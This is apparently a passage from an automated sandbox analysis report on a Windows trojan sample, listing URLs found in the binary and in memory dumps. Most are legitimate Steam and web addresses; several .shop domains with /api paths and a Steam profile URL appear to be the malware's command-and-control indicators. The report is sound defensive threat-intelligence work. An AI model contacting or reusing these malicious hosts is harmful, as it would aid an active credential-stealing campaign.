            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawzhotdog.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fragnantbui.shop/apip
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop/f
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/1
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recap8
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop//O9
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/7
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/apiiU
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop:443/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stogeneratmns.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stogeneratmns.shop/g9
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vozmeatillu.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vozmeatillu.shop/0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vozmeatillu.shop/O9
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vozmeatillu.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vozmeatillu.shop/apip
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
